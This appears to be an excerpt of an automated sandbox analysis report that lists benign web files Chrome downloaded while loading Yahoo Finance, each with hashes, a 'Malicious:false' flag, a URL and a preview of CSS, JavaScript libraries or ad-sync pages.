                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YEOBHtwR3Zd2OfHuXOJnUhO4:YEOBq3dO+JUX
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EEC750FE7952218343E0567CA0981F77
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F4ED408131CEBD748481483DA72AE3C3AF1A13C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1DDE2FF52B39C64A3C1AC7278B94AA286DC8DA3DFE7E497899E2249638EE7439
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D181E865011A875B12997E6D724ED6043714D8E8CC7595C1DE32522F7A35D27013E6F95255E32AB8CC195F4A06C95BC0EBEE1A646C99F2492B929BDF8933E8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ups.analytics.yahoo.com/ups/58824/sync?format=json&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"axid": "eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1241)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.035431184018495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:/JH7JMI59cq5GPSC5Ip95bL+Obn9WJHxrWpm:fZf9WQm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:45C87051EC4CBA4BDF9B14D463BB3903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:1E4DA41E2AC984F8569E11872B2C4B2AD48A41DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7C30CCA4A23F65F4E65D31A96EA37839B34530220AFB43EBF0B56F17B71E4C88
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F877576AC9EDA60A10AE62DE72B835BA931F0A7AB9D7843F321CC9BC379F0ECDBEF2E4913A52331A913E26DED5480A91614A97B1BBEBB33EEDEB86FFD551FD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/PortfolioNameHeader.BeM8jDG1.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.bar-graph.yf-1xw78oq.yf-1xw78oq{display:inline-block;height:11px;width:var(--space-11);max-width:96px;background-color:var(--ui-gray-200);position:relative;border-radius:var(--border-radius-m)}.bar-graph.yf-1xw78oq .inner-bar.yf-1xw78oq{border-radius:var(--border-radius-m) 0 0 var(--border-radius-m);height:100%;position:absolute;top:0;left:0}.bar-graph.yf-1xw78oq .inner-bar.full.yf-1xw78oq{border-radius:var(--border-radius-m)}.label.yf-1xw78oq.yf-1xw78oq{margin:0 var(--space-2)}div.yf-1tp569i{text-align:center;border-radius:var(--border-radius-s);padding:.13rem .38rem;font-weight:var(--font-bold);font-size:var(--font-m);text-transform:uppercase;margin:auto}div.up.yf-1tp569i{background-color:var(--positive);color:var(--text-inverse)}div.down.yf-1tp569i{background-color:var(--negative);color:var(--text-inverse)}div.hold.yf-1tp569i{background-color:var(--text2);color:var(--text-inverse)}.container.yf-1h6ro5u{white-space:normal;width:100px;text-align:right}.desktopTitle.yf-ofsp4c{overflow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (771)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.042965938925255
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:+xdjdN5nCGjaZbih+yB6h+ykWfFh+yIwWyjh+yksj:+xdVCmaZGkyB6kyFkyvjjkyfj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4E12F6AC0D3C0E537F97A5CC7B36ADC4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C87AB4F9CD79991A00CB9C3678307D4BF0160C5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6620FCFD88792CF85460512866D9C8D2963ABFEF5BFF29C7C9482153B5494E12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B5851BE427039B8AD2EB40B1D8492631CF4D350ED5C0A26D9C4978A42CFB0C09129F8931B1FCAA5B013B6D2AD6EB90E3DFB5CF4840182614F634BB85A277E8F0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/MenuSurface.B2lZ9U34.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.dialog-container.yf-1wzc9a4.yf-1wzc9a4{position:fixed;display:flex;inset:unset;border:1px solid var(--light-divider);box-shadow:0 4px 10px #00000014;padding:0;border-radius:var(--border-radius-m);background-color:var(--menu-background-color, var(--surface1))}.dialog-container[aria-hidden=true].yf-1wzc9a4.yf-1wzc9a4{display:none}.dialog-container.yf-1wzc9a4 .dialog-content.yf-1wzc9a4{position:relative;margin:auto}.dialog-container.yf-1wzc9a4 .dialog-content.yf-1wzc9a4 .closeBtn{position:absolute;top:4px;right:4px}@media only screen and (width >= 768px){.dialog-container.yf-1wzc9a4 .dialog-content.yf-1wzc9a4{max-width:var(--menu-max-width, 450px);min-width:var(--menu-min-width)}.dialog-container.yf-1wzc9a4 .dialog-content.yf-1wzc9a4 .closeBtn{top:8px;right:8px}}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (12677), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12677
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20916317837861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3iuQlq2TtwcbF6IlJ+Knosw+wTzW9LxXUJsb5vaU8ZW:Shl1bF6IlJ+Kf9dE8oU8ZW
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DA320D39602C7372E993ED8CA6026A92
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E450CBC300424D62D5D40A0716345D0EA1A7DBD6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B28A31976C8BC8B8869AA7367D73636F8462F54A42EDD9EB00C28DCAF1FDD7C2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F46A3F8A77CFF2E3C746DA437BF57EDA2997EFE1FE36B083AF076CD8F09160545C2C6D7A5AED521D89612F3815195EDAB8B0930112743E80FA9BAF1625F4C347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-rapid-1.10.9-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-rapid",[],t):"object"==typeof exports?exports["wafer-rapid"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-rapid"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):99
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.545226546244481
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSHyUKpXRdH/UIfLUtPVdH2bQQOGLT4:YWLSHyUOH/RfgtPVIbQQbn4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9E1462680605FB3527A80A117815247E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:E65FC475714B3B4ABC13B889F7B1420D27A4FD52
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:718672F757B6DF73594D37326A4639B46C3CACB902A7816FB6D64AFB12BE1E5C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DAB489486E6B43ECE279B05BC56B0A43C7721E5EE858F96A48FB960930E67F66AFEA75B2482F70F9649E785E4641E4E9F87C0301BA930A1849A5582D0D7F173E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"version":"v3","id":"amx*3*85b2d118-423d-4245-b001-a881df171c6a*08b17ccc28422c2538145878e50aa866"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537148856&val=ZvreFAAGJF7U4wAF&_test=ZvreFAAGJF7U4wAF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (5773)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5774
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.327225232341942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:motitk6L3rFAgGw7NXVkMk0Sk07xY09oGqbvhckGYc+jsk0Y59F05a9/ZlMVny8s:moQGM36gt+7I2W09oGqbvhrGYc+jb0YN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:00349D44A1DD06CF04811362713945C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0BD511F8EE821341DECE89C8082AC2179C239949
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5D32820A8619482AE6842239D50CC3D5DD05D7D9C5A030EE4FDD7B817DFA1EEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:39C10F6494BEA755B9CA880E26D9A9E12BA0BD291D2CB4309C6D405FD61FDDA2B2EC438A4E46F295496821A8A1975C52361FED66B9D8E6D0A7F0DDFA22F60BC2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{r as t}from"./commonUtil.BWwawKjd.js";const E={ns:"markets"};var k=(e=>(e.OVERVIEW="overview",e.INDICES="world-indices",e.FUTURES="commodities",e.BONDS="bonds",e.CURRENCIES="currencies",e.OPTIONS="options",e.SECTORS="sectors",e.STOCKS="stocks",e.CRYPTO="crypto",e.ETF="etfs",e.MUTUALFUNDS="mutualfunds",e))(k||{});const R={stocks:"equity",crypto:"cryptocurrency",etfs:"etf"},I=e=>e==="stocks"||e==="crypto"||e==="etfs"?R[e]:"",g={overview:{id:"OVERVIEW",uri:t({category:"overview"})},stocks:{id:"STOCKS",fields:["ticker","symbol","longName","shortName","regularMarketPrice","regularMarketChange","regularMarketChangePercent","regularMarketVolume","averageDailyVolume3Month","marketCap","trailingPE","fiftyTwoWeekChangePercent","fiftyTwoWeekRange","regularMarketOpen","longName","sparkline"],scrIds:{"most-active":"MOST_ACTIVES",gainers:"DAY_GAINERS",losers:"DAY_LOSERS","52-week-gainers":"FIFTY_TWO_WK_GAINERS","52-week-losers":"FIFTY_TWO_WK_LOSERS"},tabs:["most-active","trending","gainers","
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11230), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11230
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.207546962286139
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3ciaumTuQ/2lAg6gA2MZzXanihYZRCq4b8jbcMiISXsrFyOof7:3vmiQhgAfzXancMCqYciFXsrFyv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B29975904D91FE6FF597A7FD5A315391
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:79A3373AD0C641BD858221C4B70A995215064AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B2918846CC75BC0BFC18AF81ABF8F0E4F9D30CFD5383639CE07601F4A74684E5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:480A454CCED569439C22251D6DBB4300A340A2BBD777E62F90C2634902774F58046AE142848A2AC81276989642AF026A85B6F4F1E19A10B45BE9D7C2FB54A3F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-native-da",[],t):"object"==typeof exports?exports["wafer-native-da"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-native-da"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var o=r[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,t),o.l=!0,o.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):89501
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.289893677458563
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?predirect=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dpbm%26i%3D&gdpr=0&gdprConsent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):269
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.235195150873638
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hn8FQiowadCc4svmzsMX5mBQLzLcIjEdxvAqJmW/upLV4HX4QL:hnMQbwuO4M2e4xYqJmWeV4IQL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C7B1A96E4676C76C0240D4A835FB7252
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8A4DE304873BB5A8C11DD86B86CC8B8356BAD8B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4DF52D49C57BC3E7158CB052CC05C60F1258C24DE5C5728DAC5D43272943AD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:349FE7702C3A1355026D9051B3BDF4143358A34A416DF67099E7FA16CACD72270E40DAF59C24C1FE0C6705F91AEDABD0E9D8298985E6A3BF9F133C08DC07AD86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://eus.rubiconproject.com/usync.html?p=33across&endpoint=us-east&us_privacy=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">. Copyright Magnite 2024 -->.<html>.<head>. <title>User-Sync</title>.</head>.<body>. <script type="text/javascript" src="usync.js"></script>.</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.211096750884003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:sQTbeXlXVLzGQN94u9oqcydwhtKaIW0LpUsCROQHc2FwvYV62Bx56ezCwmvzwgJH:vYk62BexvdtnZC0n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:753CA81780B531EBF181A1319E8CF77A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2E955E9085AB2A1C6BCE4CDA4E1918C2C0197392
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:058B13304B1E30C3568FCF34BE167C7C79F8810E0B8AD6D691AB88211D0404CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DE0D7A41829E96D9F19951484546F60DA92A0801C9D4AF57AAACE4D5B5BCD066AE822B7727B433DB0D93FFFB2F33D133B609387A8BDC74ECFF9AB9332C3D76FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Spinner.D9ew0_W4.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Pt,e as zt,T as a,d as St,f as r,U as s,i as e,q as t,K as n,O as vt,L as Et,k as xt,l as i,n as wt}from"./scheduler.Dsuh-FKt.js";import{S as Nt,i as qt}from"./index.CvwOawEI.js";function Bt(X){let l,o,x,z,f,h,K,u,L,d,N,O,c,T,m,q,U,k,V,g,B,j,p,A,y,F,G,_,H,b,C,J,v,M,E,D,Q,w,R,P,Y;return{c(){l=zt("div"),o=a("svg"),x=a("g"),z=a("rect"),f=a("g"),h=a("g"),K=a("g"),u=a("path"),L=a("g"),d=a("path"),N=a("g"),O=a("g"),c=a("path"),T=a("g"),m=a("path"),q=a("g"),U=a("g"),k=a("path"),V=a("g"),g=a("path"),B=a("g"),j=a("g"),p=a("path"),A=a("g"),y=a("path"),F=a("g"),G=a("g"),_=a("path"),H=a("g"),b=a("path"),C=a("g"),J=a("g"),v=a("path"),M=a("g"),E=a("path"),D=a("g"),Q=a("g"),w=a("path"),R=a("g"),P=a("path"),this.h()},l(S){l=St(S,"DIV",{class:!0});var I=r(l);o=s(I,"svg",{width:!0,height:!0,"shape-rendering":!0,"text-rendering":!0,style:!0,viewBox:!0,xmlns:!0,role:!0,"aria-label":!0});var Z=r(o);x=s(Z,"g",{display:!0});var nt=r(x);z=s(nt,"rect",{width:!0,height:!0,fill:!0}),r(z).forEach(e),n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (835)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):836
